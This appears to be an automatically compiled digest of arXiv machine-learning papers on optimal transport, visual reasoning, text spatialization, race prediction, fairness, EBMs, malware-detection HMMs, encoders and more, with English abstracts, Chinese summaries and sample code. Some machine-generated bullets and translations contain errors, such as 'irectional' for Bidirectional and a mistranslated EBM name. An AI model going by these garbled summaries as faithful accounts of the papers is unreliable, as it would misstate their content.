  • results: 我们特别关注边缘分布的熵,表明高熵边缘分布会带来更难的最优传输问题,而我们的算法恰好适合这类问题。我们还针对算法与问题参数进行了细致的消融分析,并在 MNIST 数据集上进行了基准测试。结果表明,该算法可以成为最优传输工具箱中的有用补充。代码开源于 https://github.com/adaptive-agents-lab/MDOT-PNCG 。
    Abstract We design a novel algorithm for optimal transport by drawing from the entropic optimal transport, mirror descent and conjugate gradients literatures. Our algorithm is able to compute optimal transport costs with arbitrary accuracy without running into numerical stability issues. The algorithm is implemented efficiently on GPUs and is shown empirically to converge more quickly than traditional algorithms such as Sinkhorn's Algorithm both in terms of number of iterations and wall-clock time in many cases. We pay particular attention to the entropy of marginal distributions and show that high entropy marginals make for harder optimal transport problems, for which our algorithm is a good fit. We provide a careful ablation analysis with respect to algorithm and problem parameters, and present benchmarking over the MNIST dataset. The results suggest that our algorithm can be a useful addition to the practitioner's optimal transport toolkit. Our code is open-sourced at https://github.com/adaptive-agents-lab/MDOT-PNCG .
    摘要 我们借鉴熵正则化最优传输、镜像下降和共轭梯度等文献,设计了一种新的最优传输算法。该算法能够以任意精度计算最优传输代价,且不会遇到数值稳定性问题。算法可在 GPU 上高效实现,实证表明在许多情况下,无论是迭代次数还是实际运行时间,都比 Sinkhorn 算法等传统算法收敛更快。我们特别关注边缘分布的熵,并表明高熵的边缘分布会带来更难的最优传输问题,而我们的算法正适合这类问题。我们针对算法与问题参数进行了细致的消融分析,并在 MNIST 数据集上进行了基准测试。结果表明,该算法可以成为实践者最优传输工具箱中的有用补充。我们的代码开源于 https://github.com/adaptive-agents-lab/MDOT-PNCG 。
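
For reference, the classical baseline named in the abstract, Sinkhorn's algorithm for entropy-regularized optimal transport between two discrete marginals, looks as follows. This is only the baseline the paper compares against; the paper's mirror-descent / conjugate-gradient method is more involved and is not reproduced here.

```python
import numpy as np

def sinkhorn(mu, nu, cost, eps=0.05, iters=500):
    K = np.exp(-cost / eps)                 # Gibbs kernel
    u = np.ones_like(mu)
    for _ in range(iters):
        v = nu / (K.T @ u)
        u = mu / (K @ v)
    plan = u[:, None] * K * v[None, :]      # approximate transport plan
    return (plan * cost).sum(), plan

n = 50
x, y = np.linspace(0, 1, n), np.linspace(0, 1, n)
mu = np.ones(n) / n                          # uniform (high-entropy) marginal
nu = np.exp(-(y - 0.7) ** 2 / 0.01); nu /= nu.sum()
cost = (x[:, None] - y[None, :]) ** 2
ot_cost, plan = sinkhorn(mu, nu, cost)
print(f"entropic OT cost ~ {ot_cost:.4f}")
```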

Does Visual Pretraining Help End-to-End Reasoning?

  • paper_url: http://arxiv.org/abs/2307.08506
  • repo_url: None
  • paper_authors: Chen Sun, Calvin Luo, Xingyi Zhou, Anurag Arnab, Cordelia Schmid
  • for: investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, and confirm the feasibility of a neural network “generalist” to solve visual recognition and reasoning tasks.
  • methods: use a simple and general self-supervised framework which “compresses” each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context.
  • results: observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning, and our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.
    Abstract We aim to investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, with the help of visual pretraining. A positive result would refute the common belief that explicit visual abstraction (e.g. object detection) is essential for compositional generalization on visual reasoning, and confirm the feasibility of a neural network "generalist" to solve visual recognition and reasoning tasks. We propose a simple and general self-supervised framework which "compresses" each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context. To minimize the reconstruction loss, the network must learn a compact representation for each image, as well as capture temporal dynamics and object permanence from temporal context. We perform evaluation on two visual reasoning benchmarks, CATER and ACRE. We observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning. Our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.
    摘要 我们旨在考察借助视觉预训练,端到端的视觉推理学习能否由通用神经网络实现。肯定的结果将反驳“显式视觉抽象(如目标检测)对视觉推理中的组合泛化不可或缺”这一普遍看法,并证明一个“通才”神经网络可以同时解决视觉识别与推理任务。我们提出了一个简单而通用的自监督框架:用 Transformer 网络将每帧视频“压缩”为一小组 token,并基于压缩后的时间上下文重建其余帧。为了最小化重建损失,网络必须为每幅图像学习紧凑的表示,并从时间上下文中捕捉时间动态与物体恒存性。我们在 CATER 和 ACRE 两个视觉推理基准上进行评估,发现预训练对于端到端视觉推理实现组合泛化至关重要;相比包括图像分类和显式目标检测在内的传统监督预训练,我们提出的框架具有大幅优势。

Large-Scale Evaluation of Topic Models and Dimensionality Reduction Methods for 2D Text Spatialization

  • paper_url: http://arxiv.org/abs/2307.11770
  • repo_url: https://github.com/cgshpi/topic-models-and-dimensionality-reduction-benchmark
  • paper_authors: Daniel Atzberger, Tim Cech, Willy Scheibel, Matthias Trapp, Rico Richter, Jürgen Döllner, Tobias Schreck
  • for: 这篇论文旨在考察主题模型与降维方法在将语料空间化为二维散点图方面的有效性。
  • methods: 该论文使用了多种主题模型和维度减少算法,并对它们的组合进行了大规模的计算评估。
  • results: 根据计算结果, interpretable topic models 能够很好地捕捉文本 Corpora 的结构,而 t-SNE 作为维度减少算法也有良好的效果。
    Abstract Topic models are a class of unsupervised learning algorithms for detecting the semantic structure within a text corpus. Together with a subsequent dimensionality reduction algorithm, topic models can be used for deriving spatializations for text corpora as two-dimensional scatter plots, reflecting semantic similarity between the documents and supporting corpus analysis. Although the choice of the topic model, the dimensionality reduction, and their underlying hyperparameters significantly impact the resulting layout, it is unknown which particular combinations result in high-quality layouts with respect to accuracy and perception metrics. To investigate the effectiveness of topic models and dimensionality reduction methods for the spatialization of corpora as two-dimensional scatter plots (or basis for landscape-type visualizations), we present a large-scale, benchmark-based computational evaluation. Our evaluation consists of (1) a set of corpora, (2) a set of layout algorithms that are combinations of topic models and dimensionality reductions, and (3) quality metrics for quantifying the resulting layout. The corpora are given as document-term matrices, and each document is assigned to a thematic class. The chosen metrics quantify the preservation of local and global properties and the perceptual effectiveness of the two-dimensional scatter plots. By evaluating the benchmark on a computing cluster, we derived a multivariate dataset with over 45 000 individual layouts and corresponding quality metrics. Based on the results, we propose guidelines for the effective design of text spatializations that are based on topic models and dimensionality reductions. As a main result, we show that interpretable topic models are beneficial for capturing the structure of text corpora. We furthermore recommend the use of t-SNE as a subsequent dimensionality reduction.
    摘要 主题模型是一类用于发现文本语料中语义结构的无监督学习算法。结合后续的降维算法,主题模型可用于将语料空间化为二维散点图,反映文档之间的语义相似性并支持语料分析。为考察主题模型与降维方法在该任务上的有效性,我们开展了一项大规模的、基于基准的计算评估。评估包含三部分:(1)一组以文档-词项矩阵形式给出的语料,其中每篇文档被赋予一个主题类别;(2)一组由主题模型与降维方法组合而成的布局算法;(3)用于量化所得布局的质量指标,包括局部与全局性质的保持程度以及二维散点图的感知有效性。我们在计算集群上运行该基准,得到了包含超过 45000 个布局及相应质量指标的多变量数据集。基于这些结果,我们提出了基于主题模型与降维方法设计文本空间化的指南。主要结论是:可解释的主题模型有利于刻画文本语料的结构;我们还推荐使用 t-SNE 作为后续的降维方法。
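
The recommended combination (an interpretable topic model followed by t-SNE) fits in a few lines of scikit-learn. The corpus below is a toy stand-in for the benchmark corpora; hyperparameters are illustrative, not the values tuned in the paper.

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.manifold import TSNE

docs = [
    "goal match football league player",
    "match player striker goal season",
    "election vote parliament policy minister",
    "policy vote campaign election debate",
    "protein cell genome sequencing biology",
    "cell genome mutation protein enzyme",
    "stock market trading inflation economy",
    "economy inflation interest market bank",
]
counts = CountVectorizer().fit_transform(docs)                 # document-term matrix
lda = LatentDirichletAllocation(n_components=4, random_state=0)
topic_weights = lda.fit_transform(counts)                      # interpretable topic space
xy = TSNE(n_components=2, perplexity=3, random_state=0).fit_transform(topic_weights)
for doc, (x, y) in zip(docs, xy):                              # 2D scatter-plot coordinates
    print(f"({x:7.1f}, {y:7.1f})  {doc[:30]}")
```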

Can We Trust Race Prediction?

  • paper_url: http://arxiv.org/abs/2307.08496
  • repo_url: https://github.com/cangyuanli/pyethnicity
  • paper_authors: Cangyuan Li
  • for: 这个论文是为了提高美国选民登记数据中的人口统计和地理编码的准确性而写的。
  • methods: 作者使用了irectional Long Short-Term Memory (BiLSTM) 模型和一个ensemble模型,并使用了一个新的选民登记数据集来提高模型的性能。
  • results: 作者通过创建了一个全面的美国人名和姓氏分布数据库,并提供了一个高品质的比较数据集,以提高 bayesian improved surname geocoding (BISG) 和 bayesian improved firstname surname geocoding (BIFSG) 的准确性。
    Abstract In the absence of sensitive race and ethnicity data, researchers, regulators, and firms alike turn to proxies. In this paper, I train a Bidirectional Long Short-Term Memory (BiLSTM) model on a novel dataset of voter registration data from all 50 US states and create an ensemble that achieves up to 36.8% higher out of sample (OOS) F1 scores than the best performing machine learning models in the literature. Additionally, I construct the most comprehensive database of first and surname distributions in the US in order to improve the coverage and accuracy of Bayesian Improved Surname Geocoding (BISG) and Bayesian Improved Firstname Surname Geocoding (BIFSG). Finally, I provide the first high-quality benchmark dataset in order to fairly compare existing models and aid future model developers.
    摘要 在缺乏敏感的种族与族裔数据的情况下,研究人员、监管机构和公司往往不得不使用代理变量。在这篇论文中,我在一个覆盖美国全部 50 个州的新的选民登记数据集上训练了双向长短期记忆(BiLSTM)模型,并构建了一个集成模型,其样本外(OOS)F1 分数比文献中表现最好的机器学习模型最多高出 36.8%。此外,我还构建了美国最全面的名字与姓氏分布数据库,以提高 Bayesian Improved Surname Geocoding(BISG)和 Bayesian Improved Firstname Surname Geocoding(BIFSG)的覆盖范围和准确性。最后,我提供了第一个高质量的基准数据集,以便公平地比较现有模型并帮助未来的模型开发者。
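
For readers unfamiliar with BISG: it combines surname-conditional race probabilities with the racial composition of a person's geography via Bayes' rule. The sketch below shows that update; all probability values are made-up illustrative numbers, not entries from the databases described above.

```python
def bisg(p_race_given_surname, p_race_given_geo, p_race_marginal):
    # posterior over race for a fixed geography:
    #   P(race | surname, geo) ∝ P(race | surname) * P(race | geo) / P(race)
    post = {r: p_race_given_surname[r] * p_race_given_geo[r] / p_race_marginal[r]
            for r in p_race_given_surname}
    z = sum(post.values())
    return {r: p / z for r, p in post.items()}

surname = {"white": 0.60, "black": 0.25, "hispanic": 0.10, "api": 0.05}  # P(race | surname)
geo     = {"white": 0.20, "black": 0.65, "hispanic": 0.10, "api": 0.05}  # P(race | block group)
prior   = {"white": 0.60, "black": 0.13, "hispanic": 0.18, "api": 0.06}  # P(race) nationally
print(bisg(surname, geo, prior))
```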

Fairness in KI-Systemen

  • paper_url: http://arxiv.org/abs/2307.08486
  • repo_url: None
  • paper_authors: Janine Strotherm, Alissa Müller, Barbara Hammer, Benjamin Paaßen
  • for: 本文提供了关于机器学习中公平性研究的导论,包括主要的公平定义和实现公平的策略。
  • methods: 本文使用了可见的示例和图像来解释公平定义和策略,适用于多学科读者。
  • results: 本文在欧洲背景下给出了公平性研究的导论,介绍了主要的公平定义和实现公平的策略。
    Abstract The more AI-assisted decisions affect people's lives, the more important the fairness of such decisions becomes. In this chapter, we provide an introduction to research on fairness in machine learning. We explain the main fairness definitions and strategies for achieving fairness using concrete examples and place fairness research in the European context. Our contribution is aimed at an interdisciplinary audience and therefore avoids mathematical formulation but emphasizes visualizations and examples. -- Je mehr KI-gest\"utzte Entscheidungen das Leben von Menschen betreffen, desto wichtiger ist die Fairness solcher Entscheidungen. In diesem Kapitel geben wir eine Einf\"uhrung in die Forschung zu Fairness im maschinellen Lernen. Wir erkl\"aren die wesentlichen Fairness-Definitionen und Strategien zur Erreichung von Fairness anhand konkreter Beispiele und ordnen die Fairness-Forschung in den europ\"aischen Kontext ein. Unser Beitrag richtet sich dabei an ein interdisziplin\"ares Publikum und verzichtet daher auf die mathematische Formulierung sondern betont Visualisierungen und Beispiele.
    摘要 AI辅助的决策越多地影响人们的生活,这些决策的公平性就越重要。在本章中,我们提供了机器学习公平性研究的导论,借助具体示例解释了主要的公平定义和实现公平的策略,并将公平性研究置于欧洲背景之中。我们的贡献面向多学科读者,因此不使用数学表述,而是强调可视化和示例。

Cross Feature Selection to Eliminate Spurious Interactions and Single Feature Dominance Explainable Boosting Machines

  • paper_url: http://arxiv.org/abs/2307.08485
  • repo_url: None
  • paper_authors: Shree Charran R, Sandipan Das Mahapatra
  • for: 本研究旨在提高EBM模型的解释性和可靠性,并应用于各种预测任务中。
  • methods: 本研究使用了 alternate 横向选择、集成特征和模型配置变更等技术来解决EBM模型中的干扰和单个特征主导问题。
  • results: 对三个 benchmark 数据集进行了评估,结果表明 alternate 技术可以超越原始 EBM 方法,提供更好的解释性和特征选择稳定性,并提高模型的预测性能。
    Abstract Interpretability is a crucial aspect of machine learning models that enables humans to understand and trust the decision-making process of these models. In many real-world applications, the interpretability of models is essential for legal, ethical, and practical reasons. For instance, in the banking domain, interpretability is critical for lenders and borrowers to understand the reasoning behind the acceptance or rejection of loan applications as per fair lending laws. However, achieving interpretability in machine learning models is challenging, especially for complex high-performance models. Hence Explainable Boosting Machines (EBMs) have been gaining popularity due to their interpretable and high-performance nature in various prediction tasks. However, these models can suffer from issues such as spurious interactions with redundant features and single-feature dominance across all interactions, which can affect the interpretability and reliability of the model's predictions. In this paper, we explore novel approaches to address these issues by utilizing alternate Cross-feature selection, ensemble features and model configuration alteration techniques. Our approach involves a multi-step feature selection procedure that selects a set of candidate features, ensemble features and then benchmark the same using the EBM model. We evaluate our method on three benchmark datasets and show that the alternate techniques outperform vanilla EBM methods, while providing better interpretability and feature selection stability, and improving the model's predictive performance. Moreover, we show that our approach can identify meaningful interactions and reduce the dominance of single features in the model's predictions, leading to more reliable and interpretable models. Index Terms- Interpretability, EBM's, ensemble, feature selection.
    摘要 机器学习模型的可解释性是一个关键的特点,它使得人们可以更好地理解和信任机器学习模型的决策过程。在实际应用中,机器学习模型的可解释性是非常重要的,特别是在银行领域。在这个领域中,可解释性是对借款申请的 Accept 或 Reject 决策进行法律、伦理和实用上的要求。然而,实现机器学习模型的可解释性是一个挑战,特别是在复杂高性能模型中。因此,可解释性增强的机器学习模型(EBM)在各种预测任务中得到了广泛的应用。然而,这些模型可能会面临一些问题,如 redundancy 特征之间的干扰和单个特征在所有交互中的占主导地位,这些问题可能会影响模型预测的可靠性和解释性。在这篇论文中,我们探讨了一些新的方法来解决这些问题,包括使用另一种 Cross-feature 选择、ensemble 特征和模型配置变化技术。我们的方法包括一个多步特征选择过程,选择一组候选特征、ensemble特征,然后使用 EBM 模型来评估。我们在三个 benchmark 数据集上评估了我们的方法,并显示了它们在比vanilla EBM方法更高的可解释性和特征选择稳定性,以及提高模型预测性能。此外,我们还发现了我们的方法可以找到有意义的交互和减少单个特征在模型预测中的主导地位,从而提高模型的可靠性和解释性。Index Terms- 可解释性, EBM, ensemble, 特征选择.
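
The multi-step selection idea can be illustrated with the open-source interpret package: fit an EBM, rank terms by global importance, and refit on a reduced candidate set. This is only a hedged sketch on synthetic data, not the authors' procedure, and attribute names such as the explanation's "scores" key may vary between interpret versions.

```python
# pip install interpret scikit-learn
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from interpret.glassbox import ExplainableBoostingClassifier

X, y = make_classification(n_samples=2000, n_features=20, n_informative=5, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

# Step 1: fit a vanilla EBM on all features.
ebm = ExplainableBoostingClassifier(random_state=0)
ebm.fit(X_tr, y_tr)

# Step 2: rank terms by their global importance scores
# (exact keys/ordering may differ slightly across interpret versions).
expl = ebm.explain_global().data()
scores = np.array(expl["scores"][: X.shape[1]])  # keep only main-effect terms
top_k = np.argsort(scores)[::-1][:8]

# Step 3: refit a smaller EBM on the selected candidate features only.
ebm_small = ExplainableBoostingClassifier(random_state=0)
ebm_small.fit(X_tr[:, top_k], y_tr)

print("full EBM accuracy   :", ebm.score(X_te, y_te))
print("reduced EBM accuracy:", ebm_small.score(X_te[:, top_k], y_te))
```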

A Fast Task Offloading Optimization Framework for IRS-Assisted Multi-Access Edge Computing System

  • paper_url: http://arxiv.org/abs/2307.08474
  • repo_url: https://github.com/uic-jq/iopo
  • paper_authors: Jianqiu Wu, Zhongyi Yu, Jianxiong Guo, Zhiqing Tang, Tian Wang, Weijia Jia
  • for: 这个论文旨在提高无线网络,尤其是基于飞行器多访问边缘计算系统。
  • methods: 该论文提出了一种基于深度学习的优化框架,称为迭代保序策略优化(Iterative Order-Preserving Policy Optimization, IOPO),用于生成高质量的任务卸载决策。
  • results: 实验结果表明,该提议的框架可以在很短的时间内生成高效的任务卸载决策,超过其他标准方法。
    Abstract Terahertz communication networks and intelligent reflecting surfaces exhibit significant potential in advancing wireless networks, particularly within the domain of aerial-based multi-access edge computing systems. These technologies enable efficient offloading of computational tasks from user electronic devices to Unmanned Aerial Vehicles or local execution. For the generation of high-quality task-offloading allocations, conventional numerical optimization methods often struggle to solve challenging combinatorial optimization problems within the limited channel coherence time, thereby failing to respond quickly to dynamic changes in system conditions. To address this challenge, we propose a deep learning-based optimization framework called Iterative Order-Preserving policy Optimization (IOPO), which enables the generation of energy-efficient task-offloading decisions within milliseconds. Unlike exhaustive search methods, IOPO provides continuous updates to the offloading decisions without resorting to exhaustive search, resulting in accelerated convergence and reduced computational complexity, particularly when dealing with complex problems characterized by extensive solution spaces. Experimental results demonstrate that the proposed framework can generate energy-efficient task-offloading decisions within a very short time period, outperforming other benchmark methods.
    摘要 太赫兹通信网络和智能反射面在推进无线网络方面具有显著潜力,特别是在基于飞行器的多接入边缘计算系统中。这些技术可以将用户电子设备上的计算任务高效地卸载到无人机或本地执行。为了生成高质量的任务卸载分配,传统的数值优化方法往往难以在有限的信道相干时间内求解复杂的组合优化问题,从而无法快速响应系统条件的动态变化。为解决这一挑战,我们提出了一种基于深度学习的优化框架,即迭代保序策略优化(IOPO),可在毫秒级时间内生成高能效的任务卸载决策。与穷举搜索方法不同,IOPO无需穷举搜索即可持续更新卸载决策,从而加速收敛并降低计算复杂度,特别是在解空间庞大的复杂问题中。实验结果表明,所提框架能在极短时间内生成高能效的任务卸载决策,优于其他基准方法。

Hidden Markov Models with Random Restarts vs Boosting for Malware Detection

  • paper_url: http://arxiv.org/abs/2307.10256
  • repo_url: None
  • paper_authors: Aditya Raghavan, Fabio Di Troia, Mark Stamp
  • for: 这项研究旨在提升恶意软件(malware)检测的效果与效率。
  • methods: 研究比较了采用多次随机重启训练的隐马尔可夫模型(HMM)与使用AdaBoost提升的HMM。
  • results: 研究发现,与boosting相比,随机重启方法的表现出人意料地好;只有在训练数据极为有限的"冷启动"情形下,boosting带来的改进才足以抵偿其在评分阶段更高的计算成本。
    Abstract Effective and efficient malware detection is at the forefront of research into building secure digital systems. As with many other fields, malware detection research has seen a dramatic increase in the application of machine learning algorithms. One machine learning technique that has been used widely in the field of pattern matching in general-and malware detection in particular-is hidden Markov models (HMMs). HMM training is based on a hill climb, and hence we can often improve a model by training multiple times with different initial values. In this research, we compare boosted HMMs (using AdaBoost) to HMMs trained with multiple random restarts, in the context of malware detection. These techniques are applied to a variety of challenging malware datasets. We find that random restarts perform surprisingly well in comparison to boosting. Only in the most difficult "cold start" cases (where training data is severely limited) does boosting appear to offer sufficient improvement to justify its higher computational cost in the scoring phase.
    摘要 有效且高效的恶意软件检测是构建安全数字系统研究的前沿。与许多其他领域一样,恶意软件检测研究中机器学习算法的应用急剧增加。隐马尔可夫模型(HMM)是一种在模式匹配(尤其是恶意软件检测)中被广泛使用的机器学习技术。HMM的训练基于爬山式搜索,因此通过使用不同的初始值多次训练往往可以改进模型。在这项研究中,我们在恶意软件检测的场景下,比较了使用AdaBoost提升的HMM与采用多次随机重启训练的HMM,并在多个具有挑战性的恶意软件数据集上进行了实验。我们发现,与boosting相比,随机重启的表现出人意料地好;只有在训练数据极为有限的最困难的"冷启动"情形下,boosting才能带来足以抵偿其评分阶段更高计算成本的改进。
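
The random-restart strategy is straightforward to sketch with hmmlearn: train several HMMs from different seeds and keep the one with the best log-likelihood. The snippet below uses a toy Gaussian-emission HMM on synthetic data purely for illustration; the paper works with discrete opcode observations and additionally evaluates an AdaBoost variant.

```python
# pip install hmmlearn numpy
import numpy as np
from hmmlearn import hmm

rng = np.random.default_rng(0)
# Toy observation sequence standing in for per-sample malware features.
X = rng.normal(size=(500, 1))

def train_with_restarts(X, n_states=2, n_restarts=10):
    """Train several HMMs from different random initialisations and keep
    the one with the highest log-likelihood (the 'random restarts' strategy)."""
    best_model, best_ll = None, -np.inf
    for seed in range(n_restarts):
        model = hmm.GaussianHMM(n_components=n_states, n_iter=100, random_state=seed)
        model.fit(X)
        ll = model.score(X)
        if ll > best_ll:
            best_model, best_ll = model, ll
    return best_model, best_ll

model, ll = train_with_restarts(X)
print("best log-likelihood over restarts:", ll)
```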

Generalizable Classification of UHF Partial Discharge Signals in Gas-Insulated HVDC Systems Using Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08466
  • repo_url: None
  • paper_authors: Steffen Seitz, Thomas Götz, Christopher Lindenberg, Ronald Tetzlaff, Stephan Schlegel
  • for: 本研究旨在为气体绝缘高压直流系统(HVDC GIS)中的局部放电(PD)信号提供一种基于神经网络的分类方法,无需依赖脉冲序列分析特征。
  • methods: 本研究使用神经网络分类方法,比较了时域与频域输入信号,并考察了不同归一化方案的影响。
  • results: 研究发现,该神经网络分类方法可以区分由金属突起物和导电粒子引起的PD信号,并且能够泛化到未见过的运行电压倍数。
    Abstract Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.
    摘要 未被探测到的局部放电(PD)是高压气体绝缘系统(GIS)中的安全关键问题。交流电压下的PD诊断已较为成熟,而直流电压下的PD分析仍是一个活跃的研究领域,其中一个重点是对不同PD来源进行分类,以支持后续的深入分析。在本文中,我们提出了一种基于神经网络的方法,用于分类HVDC GIS绝缘子上由金属突起物和导电粒子引起的PD信号,而无需依赖脉冲序列分析特征。与已有方法不同,所提模型可以区分在负电位和正电位下采集的PD信号,并能泛化到未见过的运行电压倍数。此外,我们还比较了时域与频域输入信号的性能,并探讨了不同归一化方案对减轻传感器与缺陷位置之间自由空间路径损耗影响的作用。

A benchmark of categorical encoders for binary classification

  • paper_url: http://arxiv.org/abs/2307.09191
  • repo_url: https://github.com/drcohomology/encoderbenchmarking
  • paper_authors: Federico Matteucci, Vadim Arzamasov, Klemens Boehm
  • for: 本研究是机器学习领域中 categorical 编码器的最全面的比较研究,涵盖了多种编码器家族的32种配置,以及36种实验因素的组合,在50个数据集上进行了广泛的评估。
  • methods: 本研究使用了多种编码器家族的32种配置,以及36种实验因素的组合,在50个数据集上进行了广泛的评估。
  • results: 研究发现,选择数据集、实验因素和综合策略会对比较结论产生深远的影响,这些因素在先前的编码器比较中未得到考虑。
    Abstract Categorical encoders transform categorical features into numerical representations that are indispensable for a wide range of machine learning models. Existing encoder benchmark studies lack generalizability because of their limited choice of (1) encoders, (2) experimental factors, and (3) datasets. Additionally, inconsistencies arise from the adoption of varying aggregation strategies. This paper is the most comprehensive benchmark of categorical encoders to date, including an extensive evaluation of 32 configurations of encoders from diverse families, with 36 combinations of experimental factors, and on 50 datasets. The study shows the profound influence of dataset selection, experimental factors, and aggregation strategies on the benchmark's conclusions -- aspects disregarded in previous encoder benchmarks.
    摘要 categorical 编码器将 categorical 特征转换为数字表示形式,这些表示形式是机器学习模型的不可或缺的一部分。现有的编码器比较研究受到限制因为它们选择的(1)编码器、(2)实验因素和(3)数据集的选择有限。此外,由于不同的汇集策略的采用,导致了不一致性。这篇论文是目前最全面的 categorical 编码器比较研究,包括了32种编码器家族中的广泛评估,以及36种实验因素的组合,和50个数据集的评估。研究显示数据集选择、实验因素和汇集策略对比较的结论产生了深远的影响,这些因素在前一次编码器比较中被忽略了。
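
A toy version of the kind of encoder × model × metric loop such a benchmark runs, using the category_encoders package with scikit-learn on synthetic data; the real study varies many more experimental factors (datasets, models, tuning, aggregation strategies).

```python
# pip install category_encoders scikit-learn pandas
import numpy as np
import pandas as pd
import category_encoders as ce
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(0)
n = 2000
X = pd.DataFrame({
    "city": rng.choice(list("ABCDEFGH"), size=n),
    "device": rng.choice(["mobile", "desktop", "tablet"], size=n),
})
y = (X["city"].isin(list("ABC")) & (X["device"] == "mobile")).astype(int).to_numpy()

encoders = {
    "one-hot": ce.OneHotEncoder(),
    "ordinal": ce.OrdinalEncoder(),
    "target": ce.TargetEncoder(),
}

for name, enc in encoders.items():
    # Each encoder is fitted inside the cross-validation folds via the pipeline.
    pipe = Pipeline([("encode", enc), ("clf", LogisticRegression(max_iter=1000))])
    scores = cross_val_score(pipe, X, y, cv=5, scoring="accuracy")
    print(f"{name:8s} mean accuracy = {scores.mean():.3f} +/- {scores.std():.3f}")
```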

SBMLtoODEjax: efficient simulation and optimization of ODE SBML models in JAX

  • paper_url: http://arxiv.org/abs/2307.08452
  • repo_url: https://github.com/flowersteam/sbmltoodejax
  • paper_authors: Mayalen Etcheverry, Michael Levin, Clément Moulin-Frier, Pierre-Yves Oudeyer
  • for: 这篇论文是为了提供一个可以自动将系统生物学标记语言(SBML)模型转换成Python代码的轻量级库。
  • methods: 该库利用 JAX(一个具备自动微分能力的高性能数值计算库)来实现高效的数值模拟和优化。
  • results: 该库可以帮助研究人员只需几行代码,即可将SBML模型集成到他们的Python项目和机器学习管道中,进行高性能的数值模拟和优化。
    Abstract Developing methods to explore, predict and control the dynamic behavior of biological systems, from protein pathways to complex cellular processes, is an essential frontier of research for bioengineering and biomedicine. Thus, significant effort has gone in computational inference and mathematical modeling of biological systems. This effort has resulted in the development of large collections of publicly-available models, typically stored and exchanged on online platforms (such as the BioModels Database) using the Systems Biology Markup Language (SBML), a standard format for representing mathematical models of biological systems. SBMLtoODEjax is a lightweight library that allows to automatically parse and convert SBML models into python models written end-to-end in JAX, a high-performance numerical computing library with automatic differentiation capabilities. SBMLtoODEjax is targeted at researchers that aim to incorporate SBML-specified ordinary differential equation (ODE) models into their python projects and machine learning pipelines, in order to perform efficient numerical simulation and optimization with only a few lines of code. SBMLtoODEjax is available at https://github.com/flowersteam/sbmltoodejax.
    摘要 开发方法来探索、预测和控制生物系统的动态行为,从蛋白道路到复杂的细胞过程,是生物工程和生物医学研究的关键前沿。因此,在计算推理和数学模型化方面的努力很大,以致已经形成了大量的公共可用模型,通常通过在线平台(如生物模型数据库)存储和交换,使用系统生物学标记语言(SBML),这是表示生物系统数学模型的标准格式。SBMLtoODEjax 是一个轻量级库,它可以自动解析和将 SBML 模型转换为 Python 模型,并将其写入终端到终端在 JAX 中,JAX 是一个高性能的数值计算库,具有自动导数能力。SBMLtoODEjax 是为研究者们提供,他们想将 SBML 规定的常微分方程(ODE)模型 integrate 到他们的 Python 项目和机器学习管道中,以实现高效的数值优化和优化,只需几行代码。SBMLtoODEjax 可以在 GitHub 上找到:https://github.com/flowersteam/sbmltoodejax。
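
SBMLtoODEjax generates plain JAX modules for SBML-defined ODE systems; the snippet below is not its actual API or output, just a hand-written illustration of simulating a small ODE with JAX's odeint, i.e. the kind of vector field such generated modules wrap.

```python
# pip install jax jaxlib
import jax.numpy as jnp
from jax.experimental.ode import odeint

def toy_gene_circuit(y, t, k, gamma):
    """Toy 2-species ODE standing in for an SBML-derived rate function."""
    a, b = y
    da = k / (1.0 + b**2) - gamma * a   # mutual repression plus degradation
    db = k / (1.0 + a**2) - gamma * b
    return jnp.array([da, db])

y0 = jnp.array([1.0, 0.5])
ts = jnp.linspace(0.0, 50.0, 200)
traj = odeint(toy_gene_circuit, y0, ts, 2.0, 0.1)  # extra args: k, gamma
print(traj.shape)  # (200, 2) trajectory of both species over time
```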

From random-walks to graph-sprints: a low-latency node embedding framework on continuous-time dynamic graphs

  • paper_url: http://arxiv.org/abs/2307.08433
  • repo_url: None
  • paper_authors: Ahmad Naser Eddin, Jacopo Bono, David Aparício, Hugo Ferreira, João Ascensão, Pedro Ribeiro, Pedro Bizarro
  • for: 这篇研究旨在提出一个低延迟、高效的动态图节点嵌入框架,以处理真实世界中的连续时间动态图数据。
  • methods: 该方法对基于随机游走的特征进行流式、低延迟的近似:时间感知的节点嵌入汇总多跳信息,却仅通过对新到边的单跳操作来计算。
  • results: 结果显示,graph-sprints 方法可以取得与现有高延迟模型相当或更好的性能,同时实现低延迟的推理。
    Abstract Many real-world datasets have an underlying dynamic graph structure, where entities and their interactions evolve over time. Machine learning models should consider these dynamics in order to harness their full potential in downstream tasks. Previous approaches for graph representation learning have focused on either sampling k-hop neighborhoods, akin to breadth-first search, or random walks, akin to depth-first search. However, these methods are computationally expensive and unsuitable for real-time, low-latency inference on dynamic graphs. To overcome these limitations, we propose graph-sprints a general purpose feature extraction framework for continuous-time-dynamic-graphs (CTDGs) that has low latency and is competitive with state-of-the-art, higher latency models. To achieve this, a streaming, low latency approximation to the random-walk based features is proposed. In our framework, time-aware node embeddings summarizing multi-hop information are computed using only single-hop operations on the incoming edges. We evaluate our proposed approach on three open-source datasets and two in-house datasets, and compare with three state-of-the-art algorithms 